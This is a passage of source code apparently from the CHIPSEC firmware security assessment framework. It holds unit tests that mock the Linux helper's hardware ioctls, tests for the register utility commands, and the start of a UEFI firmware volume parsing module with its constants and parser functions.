            cpacker.pack_pci(0x86),
        (0xC0084303, b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.pack_pci(0x8086),
        (0xC0084303, b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.pack_pci(0xA0828086),
        (0xc0084304, b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xab\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.pack_pci(0x1),
        (0xC0084307, b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.pack_cpuinfo(0x406F1),
        (0xC0084307, b'\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.pack_cpuinfo(0xFFFFF),
        (0xc0084307, b'\x08\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.pack_cpuinfo(0xfffff),
        (0xc008430c, b'\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00'):
            cpacker.custom_pack(2, 0x1, 0),
        (0xC0084312, b'\x00\x00\x01\xfe\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00'):
            b'\x00\x02\xff\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00',
        (0xc0084313, b'#\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00'):
            0x1,
        (0xC0084314, b'E#\x01\x00\x00\x00\x00\x00'):
            b'\x00\x00\x00\x00\x00\x00\x00\x00',
        (0xc0084315, b'\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.custom_pack(5, 0x200, 4),
        (0xc0084316, b'\x00\x00\x00\x16\x00\x00\x00\x00'):
            cpacker.custom_pack(1, 0x1, 0),
         }

    def ioctlret(*arg):
        for i in arg:
            if type(i) is int:
                print(hex(i))
            else:
                print(i)
        if arg[1:] in LinuxHelperTest.ioctldict:
            return LinuxHelperTest.ioctldict[arg[1:]]
        return b'\xab'*40

    @patch('chipsec.helper.linux.linuxhelper.open')
    @patch('chipsec.helper.linux.linuxhelper.subprocess.call')
    @patch('chipsec.helper.linux.linuxhelper.subprocess.check_output')
    @patch('chipsec.helper.linux.linuxhelper.os.path.exists')
    @patch('chipsec.helper.linux.linuxhelper.os.chmod')
    @patch('chipsec.helper.linux.linuxhelper.fcntl')
    def setUp(self, mock_fcntl, os_chmod, os_path_exists, subprocess_check_output, subprocess_call, mock_open):
        mock_fcntl().ioctl.side_effect = LinuxHelperTest.ioctlret
        import chipsec.helper.linux.linuxhelper as lh
        unittest.TestCase.setUp(self)
        with patch.dict(lh.os.__dict__, {'chown': lambda *args: None}):
            self.lhelper = lh.LinuxHelper()
            mock_open().return_value = True
            os_chmod().return_value = True
            os_path_exists().return_value = True
            subprocess_check_output().return_value = True
            subprocess_call().return_value = True
            # breakpoint()
            self.assertTrue(self.lhelper.create())
            self.assertTrue(self.lhelper.start())
            # breakpoint()
            pass

    def tearDown(self):
        unittest.TestCase.tearDown(self)
        self.assertTrue(self.lhelper.delete())

    def test_map_io_space(self, _, lh_ioctl):
        self.assertRaises(UnimplementedAPIError, self.lhelper.map_io_space, 0, 0, 0)

    def test_write_phys_mem(self, _, _1):
        self.lhelper.dev_fh = Mock()
        self.lhelper.dev_fh.seek.return_value = 0
        self.lhelper.dev_fh.write.return_value = 2
        write_return = self.lhelper.write_phys_mem(0x5000, 0x2, b'\xab\xab')
        self.assertEqual(write_return, 2)

    def test_read_phyis_mem(self, _, _1):
        self.lhelper.dev_fh = Mock()
        self.lhelper.dev_fh.seek.return_value = 0
        self.lhelper.dev_fh.read.return_value = b'\xac\xdc'

        mem_value = self.lhelper.read_phys_mem(0x5000, 0x2)
        self.assertEqual(mem_value, b'\xac\xdc')

    def test_va2pa(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        pa = self.lhelper.va2pa(0x12345)
        self.assertEqual(pa, (0, 0))

    def test_read_pci_reg_cpu_one_byte(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        pci_read_value = self.lhelper.read_pci_reg(0, 0, 0, 0, 0x1)
        self.assertEqual(pci_read_value, 0x86)

    def test_read_pci_reg_cpu_two_bytes(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        pci_read_value = self.lhelper.read_pci_reg(0, 0, 0, 0, 0x2)
        self.assertEqual(pci_read_value, 0x8086)

    def test_read_pci_reg_cpu_four_bytes(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        pci_read_value = self.lhelper.read_pci_reg(0, 0, 0, 0, 0x4)
        self.assertEqual(pci_read_value, 0x9A128086)

    def test_read_pci_reg_pch_one_byte(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        pci_read_value = self.lhelper.read_pci_reg(0, 0x1f, 0, 0, 0x1)
        self.assertEqual(pci_read_value, 0x86)

    def test_read_pci_reg_pch_two_bytes(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        pci_read_value = self.lhelper.read_pci_reg(0, 0x1f, 0, 0, 0x2)
        self.assertEqual(pci_read_value, 0x8086)

    def test_read_pci_reg_pch_four_bytes(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        pci_read_value = self.lhelper.read_pci_reg(0, 0x1f, 0, 0, 0x4)
        self.assertEqual(pci_read_value, 0xA0828086)

    def test_write_pci_reg_cpu_one_byte(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        pci_write_return = self.lhelper.write_pci_reg(0, 0, 0, 0, 0x1, 0xab)
        self.assertEqual(pci_write_return, 0x1)

    # TODO Test: load_ucode_update() - Has error in implementation.
    # def test_load_ucode_update(self, _, lh_ioctl):
    #     lh_ioctl.side_effect = LinuxHelperTest.ioctlret
    #     load_ucode_update_return = self.lhelper.load_ucode_update(0, b'\x55')
    #     self.assertTrue(load_ucode_update_return)

    def test_read_io_port(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        ioport_read_value = self.lhelper.read_io_port(0xB8, 4)
        self.assertEqual(ioport_read_value, 0x1)

    def test_write_io_port(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        ioport_write_return = self.lhelper.write_io_port(0xB8, 0x55, 4)
        self.assertEqual(ioport_write_return, 0x1)

    # TODO Test: read_cr

    # TODO Test: write_cr

    # TODO Test: read_msr

    # TODO Test: write_msr

    # TODO Test: get_descriptor_table

    def test_cpuid_one(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        cpuid_value = self.lhelper.cpuid(1, 0)
        self.assertEqual(cpuid_value, (0x406F1, 0, 0, 0))

    def test_cpuid_two(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        cpuid_value = self.lhelper.cpuid(2, 0)
        self.assertEqual(cpuid_value, (0xFFFFF, 0, 0, 0))

    def test_alloc_phys_mem(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        alloc_return = self.lhelper.alloc_phys_mem(0x8, 0x1000_0000_0000)
        self.assertEqual(alloc_return, (0x1, 0x0))

    def test_free_phys_mem(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        free_return = self.lhelper.free_phys_mem(0x1600_0000)
        self.assertEqual(free_return, 0x1)

    def test_read_mmio_reg(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        mmio_read_value = self.lhelper.read_mmio_reg(0xfe010000, 0x4)
        self.assertEqual(mmio_read_value, 0x7FF0200)

    def test_write_mmio_reg(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        self.lhelper.write_mmio_reg(0x123, 0x1, 0x22)

    def test_get_ACPI_table(self, _, lh_ioctl):
        self.assertRaises(UnimplementedAPIError, self.lhelper.get_ACPI_table, "SDEV")

    def test_msgbus_send_read_message(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        msg_s_r_m = self.lhelper.msgbus_send_read_message(0x1, 0x2)
        self.assertEqual(msg_s_r_m, 0x200)

    def test_msgbus_send_write_message(self, _, lh_ioctl):
        lh_ioctl.side_effect = LinuxHelperTest.ioctlret
        msg_s_r_m = self.lhelper.msgbus_send_write_message(0x1, 0x2, 0x3)
        self.assertIsNone(msg_s_r_m)

    # TODO Test: get_affinity

    # TODO Test: set_affinity

    # TODO Test: EFI_supported

    # TODO Test: delete_EFI_variable

    # TODO Test: list_EFI_variables

    # TODO Test: get_EFI_variable

    # TODO Test: set_EFI_variable

    # TODO Test: hypercall

    # TODO Test: send_sw_smi

    # TODO Test: get_tool_info

    def test_get_threads_count(self, _, _1):
        thread_count = self.lhelper.get_threads_count()
        self.assertEqual(thread_count, cpu_count())

    def test_retpoline_enabled(self, _, lh_ioctl):
        self.assertRaises(NotImplementedError, self.lhelper.retpoline_enabled)



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2017, Google
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
#

import unittest

from tests.software import mock_helper, util


class TestRegChipsecUtil(util.TestChipsecUtil):
    """Test the reg commands exposed by chipsec_utils."""

    def test_reg_read(self):
        self._chipsec_util("reg read PCI0.0.0_VID")
        self._assertLogValue("PCI0.0.0_VID", "0x8086")

    def test_reg_read_field(self):
        self._chipsec_util("reg read PCI0.0.0_TOUUD LOCK")
        self._assertLogValue("PCI0.0.0_TOUUD.LOCK", "0x0")

    def test_reg_read_field1(self):
        self._chipsec_util("reg read_field PCI0.0.0_TOUUD LOCK")
        self._assertLogValue("PCI0.0.0_TOUUD.LOCK", "0x0")

    def test_reg_get_control(self):
        self._chipsec_util("reg get_control FlashLockDown",
                           mock_helper.SPIHelper)
        self._assertLogValue("FlashLockDown", "0x0")


if __name__ == '__main__':
    unittest.main()



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2020-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

"""
UEFI Firmware Volume Parsing/Modification Functionality
"""

import hashlib
import struct
from typing import Optional, Tuple
from uuid import UUID
from chipsec.library.defines import bytestostring
from chipsec.hal.uefi_common import get_3b_size, bit_set, align
from chipsec.library.logger import logger

################################################################################################
#
# EFI Firmware Volume Defines
#
################################################################################################

FFS_ATTRIB_LARGE_FILE = 0x01
FFS_ATTRIB_FIXED = 0x04
FFS_ATTRIB_DATA_ALIGNMENT = 0x38
FFS_ATTRIB_CHECKSUM = 0x40

EFI_FILE_HEADER_CONSTRUCTION = 0x01
EFI_FILE_HEADER_VALID = 0x02
EFI_FILE_DATA_VALID = 0x04
EFI_FILE_MARKED_FOR_UPDATE = 0x08
EFI_FILE_DELETED = 0x10
EFI_FILE_HEADER_INVALID = 0x20

FFS_FIXED_CHECKSUM = 0xAA

EFI_FVB2_ERASE_POLARITY = 0x00000800

EFI_FV_FILETYPE_ALL = 0x00
EFI_FV_FILETYPE_RAW = 0x01
EFI_FV_FILETYPE_FREEFORM = 0x02
EFI_FV_FILETYPE_SECURITY_CORE = 0x03
EFI_FV_FILETYPE_PEI_CORE = 0x04
EFI_FV_FILETYPE_DXE_CORE = 0x05
EFI_FV_FILETYPE_PEIM = 0x06
EFI_FV_FILETYPE_DRIVER = 0x07
EFI_FV_FILETYPE_COMBINED_PEIM_DRIVER = 0x08
EFI_FV_FILETYPE_APPLICATION = 0x09
EFI_FV_FILETYPE_MM = 0x0a
EFI_FV_FILETYPE_FIRMWARE_VOLUME_IMAGE = 0x0b
EFI_FV_FILETYPE_COMBINED_MM_DXE = 0x0c
EFI_FV_FILETYPE_MM_CORE = 0x0d
EFI_FV_FILETYPE_MM_STANDALONE = 0x0e
EFI_FV_FILETYPE_MM_CORE_STANDALONE = 0x0f
EFI_FV_FILETYPE_FFS_PAD = 0xf0

FILE_TYPE_NAMES = {
    0x00: 'FV_ALL',
    0x01: 'FV_RAW',
    0x02: 'FV_FREEFORM',
    0x03: 'FV_SECURITY_CORE',
    0x04: 'FV_PEI_CORE',
    0x05: 'FV_DXE_CORE',
    0x06: 'FV_PEIM',
    0x07: 'FV_DRIVER',
    0x08: 'FV_COMBINED_PEIM_DRIVER',
    0x09: 'FV_APPLICATION',
    0x0A: 'FV_MM',
    0x0B: 'FV_FVIMAGE',
    0x0C: 'FV_COMBINED_MM_DXE',
    0x0D: 'FV_MM_CORE',
    0x0E: 'FV_MM_STANDALONE',
    0x0F: 'FV_MM_CORE_STANDALONE',
    0xF0: 'FV_FFS_PAD'
}

EFI_SECTION_ALL = 0x00
EFI_SECTION_COMPRESSION = 0x01
EFI_SECTION_GUID_DEFINED = 0x02
EFI_SECTION_PE32 = 0x10
EFI_SECTION_PIC = 0x11
EFI_SECTION_TE = 0x12
EFI_SECTION_DXE_DEPEX = 0x13
EFI_SECTION_VERSION = 0x14
EFI_SECTION_USER_INTERFACE = 0x15
EFI_SECTION_COMPATIBILITY16 = 0x16
EFI_SECTION_FIRMWARE_VOLUME_IMAGE = 0x17
EFI_SECTION_FREEFORM_SUBTYPE_GUID = 0x18
EFI_SECTION_RAW = 0x19
EFI_SECTION_PEI_DEPEX = 0x1B
EFI_SECTION_MM_DEPEX = 0x1C

SECTION_NAMES = {
    0x00: 'S_ALL',
    0x01: 'S_COMPRESSION',
    0x02: 'S_GUID_DEFINED',
    0x10: 'S_PE32',
    0x11: 'S_PIC',
    0x12: 'S_TE',
    0x13: 'S_DXE_DEPEX',
    0x14: 'S_VERSION',
    0x15: 'S_USER_INTERFACE',
    0x16: 'S_COMPATIBILITY16',
    0x17: 'S_FV_IMAGE',
    0x18: 'S_FREEFORM_SUBTYPE_GUID',
    0x19: 'S_RAW',
    0x1B: 'S_PEI_DEPEX',
    0x1C: 'S_MM_DEPEX'
}

EFI_SECTIONS_EXE = [EFI_SECTION_PE32, EFI_SECTION_TE, EFI_SECTION_PIC, EFI_SECTION_COMPATIBILITY16]

EFI_FIRMWARE_VOLUME_HEADER = "<16s16sQIIHHHBB"
EFI_FIRMWARE_VOLUME_HEADER_size = struct.calcsize(EFI_FIRMWARE_VOLUME_HEADER)
EFI_FV_BLOCK_MAP_ENTRY = "<II"
EFI_FFS_FILE_HEADER = "<16sHBB3sB"
EFI_FFS_FILE_HEADER2 = "<16sHBB3sBQ"
EFI_COMMON_SECTION_HEADER = "<3sB"
EFI_COMPRESSION_SECTION = "<IB"
EFI_COMPRESSION_SECTION_size = struct.calcsize(EFI_COMPRESSION_SECTION)
EFI_GUID_DEFINED_SECTION = "<16sHH"
EFI_GUID_DEFINED_SECTION_size = struct.calcsize(EFI_GUID_DEFINED_SECTION)
EFI_SECTION_ZLIB_AMD_HEADER_FORMAT = '<20xI232x'
EFI_SECTION_ZLIB_AMD_HEADER_LENGTH = struct.calcsize(EFI_SECTION_ZLIB_AMD_HEADER_FORMAT)

WIN_CERTIFICATE = "<IHH16s"
WIN_CERTIFICATE_size = struct.calcsize(WIN_CERTIFICATE)

WIN_CERT_TYPE_EFI_GUID = 0x0EF1

EFI_CRC32_GUIDED_SECTION_EXTRACTION_PROTOCOL_GUID = UUID("FC1BCDB0-7D31-49AA-936A-A4600D9DD083")
EFI_CERT_TYPE_RSA_2048_SHA256_GUID = UUID("A7717414-C616-4977-9420-844712A735BF")
EFI_CERT_TYPE_RSA_2048_SHA256_GUID_size = struct.calcsize("16s256s256s")
EFI_FIRMWARE_CONTENTS_SIGNED_GUID = UUID("0F9D89E8-9259-4F76-A5AF-0C89E34023DF")
EFI_FIRMWARE_FILE_SYSTEM_GUID = UUID("7A9354D9-0468-444A-81CE-0BF617D890DF")
EFI_FIRMWARE_FILE_SYSTEM2_GUID = UUID("8C8CE578-8A3D-4F1C-9935-896185C32DD3")
EFI_FIRMWARE_FILE_SYSTEM3_GUID = UUID("5473C07A-3DCB-4DCA-BD6F-1E9689E7349A")

EFI_FS_GUIDS = [EFI_FIRMWARE_FILE_SYSTEM3_GUID, EFI_FIRMWARE_FILE_SYSTEM2_GUID, EFI_FIRMWARE_FILE_SYSTEM_GUID]

EFI_GUIDED_SECTION_BROTLI = UUID('3D532050-5CDA-4FD0-879E-0F7F630D5AFB')
EFI_GUIDED_SECTION_GZIP = UUID('1D301FE9-BE79-4353-91C2-D23BC959AE0C')
EFI_GUIDED_SECTION_LZMA = UUID('EE4E5898-3914-4259-9D6E-DC7BD79403CF')
EFI_GUIDED_SECTION_LZMAF86 = UUID('D42AE6BD-1352-4BFB-909A-CA72A6EAE889')
EFI_GUIDED_SECTION_LZMA_HP = UUID('0ED85E23-F253-413F-A03C-901987B04397')
EFI_GUIDED_SECTION_LZMA_MS = UUID('BD9921EA-ED91-404A-8B2F-B4D724747C8C')
EFI_GUIDED_SECTION_TIANO = UUID('A31280AD-481E-41B6-95E8-127F4C984779')
EFI_GUIDED_SECTION_ZLIB_AMD1 = UUID('CE3233F5-2CD6-4D87-9152-4A238BB6D1C4')
EFI_GUIDED_SECTION_ZLIB_AMD2 = UUID('991EFAC0-E260-416B-A4B8-3B153072B804')

FIRMWARE_VOLUME_GUID = UUID("24400798-3807-4A42-B413-A1ECEE205DD8")
VOLUME_SECTION_GUID = UUID("367AE684-335D-4671-A16D-899DBFEA6B88")
EFI_FFS_VOLUME_TOP_FILE_GUID = UUID("1BA0062E-C779-4582-8566-336AE8F78F09")

DEF_INDENT = "    "


class EFI_MODULE:
    def __init__(self, Offset: int, Guid: Optional[UUID], HeaderSize: int, Attributes: int, Image: bytes):
        self.Offset = Offset
        self.Guid = Guid
        self.HeaderSize = HeaderSize
        self.Attributes = Attributes
        self.Image = Image
        self.ui_string = ''
        self.isNVRAM = False
        self.NVRAMType = ''

        self.indent = ''

        self.MD5 = None
        self.SHA1 = None
        self.SHA256 = None

        # a list of children EFI_MODULE nodes to build the EFI_MODULE object model
        self.children = []

    def name(self) -> str:
        _name = type(self).__name__.encode('ascii', 'ignore')
        _guid = str(self.Guid).upper()
        _ui_str = self.ui_string.encode('ascii', 'ignore') if self.ui_string else ''
        return f'{_name} {{{_guid}}} {_ui_str}'

    def __str__(self) -> str:
        _ind = self.indent + DEF_INDENT
        _s = ''
        if self.MD5:
            _s = f'\n{_ind}MD5   : {self.MD5}'
        if self.SHA1:
            _s += f'\n{_ind}SHA1  : {self.SHA1}'
        if self.SHA256:
            _s += f'\n{_ind}SHA256: {self.SHA256}'
        return bytestostring(_s)

    def calc_hashes(self, off: int = 0) -> None:
        if self.Image is None:
            return
        hmd5 = hashlib.md5()
        hmd5.update(self.Image[off:])
        self.MD5 = hmd5.hexdigest()
        hsha1 = hashlib.sha1()
        hsha1.update(self.Image[off:])
        self.SHA1 = hsha1.hexdigest()
        hsha256 = hashlib.sha256()
        hsha256.update(self.Image[off:])
        self.SHA256 = hsha256.hexdigest()


class EFI_FV(EFI_MODULE):
    def __init__(self, Offset: int, Guid: UUID, Size: int, Attributes: int, HeaderSize: int, Checksum: int, ExtHeaderOffset: int, Image: bytes, CalcSum: int):
        super(EFI_FV, self).__init__(Offset, Guid, HeaderSize, Attributes, Image)
        self.Size = Size
        self.Checksum = Checksum
        self.ExtHeaderOffset = ExtHeaderOffset
        self.CalcSum = CalcSum

    def __str__(self) -> str:
        schecksum = f'{self.Checksum:04X}h ({self.CalcSum:04X}h) *** checksum mismatch ***' if self.CalcSum != self.Checksum else f'{self.Checksum:04X}h'
        _s = f'\n{self.indent}{type(self).__name__} +{self.Offset:08X}h {{{self.Guid}}}: '
        _s += f"Size {self.Size:08X}h, Attr {self.Attributes:08X}h, HdrSize {self.HeaderSize:04X}h, ExtHdrOffset {self.ExtHeaderOffset:08X}h, Checksum {schecksum}"
        _s += super(EFI_FV, self).__str__()
        return bytestostring(_s)


class EFI_FILE(EFI_MODULE):
    def __init__(self, Offset: int, Guid: UUID, Type: int, Attributes: int, State: int, Checksum: int, Size: int, Image: bytes, HeaderSize: int, UD: bool, CalcSum: int):
        super(EFI_FILE, self).__init__(Offset, Guid, HeaderSize, Attributes, Image)
        self.Name = Guid
        self.Type = Type
        self.State = State
        self.Size = Size
        self.Checksum = Checksum
        self.UD = UD
        self.CalcSum = CalcSum

    def __str__(self) -> str:
        schecksum = f'{self.Checksum:04X}h ({self.CalcSum:04X}h) *** checksum mismatch ***' if self.CalcSum != self.Checksum else f'{self.Checksum:04X}h'
        _s = f'\n{self.indent}+{self.Offset:08X}h {self.name()}\n{self.indent}Type {self.Type:02X}h, Attr {self.Attributes:08X}h, State {self.State:02X}h, Size {self.Size:06X}h, Checksum {schecksum}'
        _s += (super(EFI_FILE, self).__str__() + '\n')
        return bytestostring(_s)


class EFI_SECTION(EFI_MODULE):
    def __init__(self, Offset: int, Name: str, Type: int, Image: bytes, HeaderSize: int, Size: int):
        super(EFI_SECTION, self).__init__(Offset, None, HeaderSize, 0, Image)
        self.Name = Name
        self.Type = Type
        self.DataOffset = 0
        self.Comments = ''
        self.Size = Size

        # parent GUID used in search, export to JSON/log
        self.parentGuid = None

    def name(self) -> str:
        _name = self.Name.encode('ascii', 'ignore')
        _guid = self.parentGuid
        _ui_str = self.ui_string.encode('ascii', 'ignore') if self.ui_string else ''
        return f'{_name} section of binary {{{_guid}}} {_ui_str}'

    def __str__(self) -> str:
        _s = f'{self.indent}+{self.Offset:08X}h {self.name()}: Type {self.Type:02X}h'
        if self.Guid:
            _s += f' GUID {{{self.Guid}}}'
        if self.Attributes:
            _s += f' Attr {self.Attributes:04X}h'
        if self.DataOffset:
            _s += f' DataOffset {self.DataOffset:04X}h'
        if self.Comments:
            _s += f' Comments {self.Comments}'
        _s += super(EFI_SECTION, self).__str__()
        return bytestostring(_s)


def FvSum8(buffer: bytes) -> int:
    sum8 = 0
    for b in bytestostring(buffer):
        sum8 = (sum8 + ord(b)) & 0xff
    return sum8


def FvChecksum8(buffer: bytes) -> int:
    return ((0x100 - FvSum8(buffer)) & 0xff)


def FvSum16(buffer: bytes) -> int:
    sum16 = 0
    buffer_str = bytestostring(buffer)
    blen = len(buffer) // 2
    i = 0
    while i < blen:
        el16 = ord(buffer_str[2 * i]) | (ord(buffer_str[2 * i + 1]) << 8)
        sum16 = (sum16 + el16) & 0xffff
        i = i + 1
    return sum16


def FvChecksum16(buffer: bytes) -> int:
    return ((0x10000 - FvSum16(buffer)) & 0xffff)


def ValidateFwVolumeHeader(FsGuid: UUID, FvLength: int, HeaderLength: int, ExtHeaderOffset: int, Reserved: int,
                           size: int, Calcsum: int, Checksum: int) -> bool:
    fv_rsvd = Reserved == 0
    if not fv_rsvd:
        logger().log_hal(f'WARNING: Firmware Volume {{{FsGuid}}} header has non-zero reserved values 0b{Reserved:b}')

    fv_len = FvLength <= size
    if not fv_len:
        logger().log_hal(f'WARNING: Firmware Volume {{{FsGuid}}} data length 0x{FvLength:X} '
                         f'exceeds total image length 0x{size:X}')

    fv_header_len = (ExtHeaderOffset < FvLength) and (HeaderLength < FvLength)
    if not fv_header_len:
        logger().log_hal(f'WARNING: Firmware Volume {{{FsGuid}}} header length 0x{HeaderLength:X} '
                         f'exceeds or matches volume data length 0x{FvLength:X}')

    if Checksum != Calcsum:
        logger().log_hal(f'WARNING: Firmware Volume {{{FsGuid}}} checksum 0x{Checksum:X} '
                         f'does not match calculated checksum 0x{Calcsum:X}')

    return fv_rsvd and fv_len and fv_header_len


def NextFwVolume(buffer: bytes, off: int = 0, last_fv_size: int = 0) -> Optional[EFI_FV]:
    fof = off if last_fv_size == 0 else off + max(last_fv_size, EFI_FIRMWARE_VOLUME_HEADER_size)
    size = len(buffer)
    while (fof + EFI_FIRMWARE_VOLUME_HEADER_size) < size:
        fof = bytestostring(buffer).find("_FVH", fof)
        if fof == -1 or size - fof < EFI_FIRMWARE_VOLUME_HEADER_size:
            break
        elif fof < 0x28:
            # continue searching for signature if header is not valid
            fof += 0x4
            continue
        fof = fof - 0x28
        ZeroVector, FileSystemGuid0, \
            FvLength, Signature, Attributes, HeaderLength, Checksum, ExtHeaderOffset,    \
            Reserved, Revision = struct.unpack(EFI_FIRMWARE_VOLUME_HEADER, buffer[fof:fof + EFI_FIRMWARE_VOLUME_HEADER_size])
        fvh = struct.pack(EFI_FIRMWARE_VOLUME_HEADER, ZeroVector,
                          FileSystemGuid0,
                          FvLength, Signature, Attributes, HeaderLength, 0, ExtHeaderOffset,
                          Reserved, Revision)
        if (len(fvh) < HeaderLength):
            tail = buffer[fof + len(fvh):fof + HeaderLength]
            fvh = fvh + tail
        CalcSum = FvChecksum16(fvh)
        FsGuid = UUID(bytes_le=FileSystemGuid0)
        FvImage = buffer[fof:fof + FvLength]
        if ValidateFwVolumeHeader(FsGuid, FvLength, HeaderLength, ExtHeaderOffset, Reserved, len(FvImage), CalcSum, Checksum):
            return EFI_FV(fof, FsGuid, FvLength, Attributes, HeaderLength, Checksum, ExtHeaderOffset, FvImage, CalcSum)
        else:
            fof += 0x2C
    return None


def GetFvHeader(buffer: bytes, off: int = 0) -> Tuple[int, int, int]:
    EFI_FV_BLOCK_MAP_ENTRY_SZ = struct.calcsize(EFI_FV_BLOCK_MAP_ENTRY)
    header_size = EFI_FIRMWARE_VOLUME_HEADER_size + struct.calcsize(EFI_FV_BLOCK_MAP_ENTRY)
    if (len(buffer) < header_size):
        return (0, 0, 0)
    size = 0
    fof = off + EFI_FIRMWARE_VOLUME_HEADER_size
    ZeroVector, FileSystemGuid0, \
        FvLength, _, Attributes, HeaderLength, Checksum, ExtHeaderOffset,    \
        Reserved, Revision = struct.unpack(EFI_FIRMWARE_VOLUME_HEADER, buffer[off:off + EFI_FIRMWARE_VOLUME_HEADER_size])
    numblocks, lenblock = struct.unpack(EFI_FV_BLOCK_MAP_ENTRY, buffer[fof:fof + struct.calcsize(EFI_FV_BLOCK_MAP_ENTRY)])
    fv_header_str = f'''
    \nFV volume offset: 0x{fof:08X}
    \tFvLength:         0x{FvLength:08X}
    \tAttributes:       0x{Attributes:08X}
    \tHeaderLength:     0x{HeaderLength:04X}
    \tChecksum:         0x{Checksum:04X}
    \tRevision:         0x{Revision:02X}
    \tExtHeaderOffset:  0x{ExtHeaderOffset:02X}
    \tReserved:         0x{Reserved:02X}
    FFS Guid:    {UUID(bytes_le=FileSystemGuid0)}
    '''
    logger().log_hal(fv_header_str)

    while not (numblocks == 0 and lenblock == 0):
        fof += EFI_FV_BLOCK_MAP_ENTRY_SZ
        if (fof + EFI_FV_BLOCK_MAP_ENTRY_SZ) >= len(buffer):
            return (0, 0, 0)
        if numblocks != 0:
            logger().log_hal(f'Num blocks:   0x{numblocks:08X}\n')
            logger().log_hal(f'block Len:    0x{lenblock:08X}\n')
            size = size + (numblocks * lenblock)
        numblocks, lenblock = struct.unpack(EFI_FV_BLOCK_MAP_ENTRY, buffer[fof:fof + EFI_FV_BLOCK_MAP_ENTRY_SZ])
    if FvLength != size:
        logger().log_hal("ERROR: Volume Size not consistent with Block Maps")
        return (0, 0, 0)
    if size >= 0x40000000 or size == 0:
        logger().log_hal("ERROR: Volume is corrupted")
        return (0, 0, 0)
    return (size, HeaderLength, Attributes)


def NextFwFile(FvImage: bytes, FvLength: int, fof: int, polarity: bool) -> Optional[EFI_FILE]:
    file_header_size = struct.calcsize(EFI_FFS_FILE_HEADER)
    fof = align(fof, 8)
    cur_offset = fof
    res = None
    update_or_deleted = False

    while cur_offset + file_header_size < min(FvLength, len(FvImage)):
        fsize = 0
    # if (fof + file_header_size) <= min(FvLength, len(FvImage)):
        # Check for a blank header
        if polarity:
            blank = b"\xff" * file_header_size
        else:
            blank = b"\x00" * file_header_size

        if (blank == FvImage[cur_offset:cur_offset + file_header_size]):
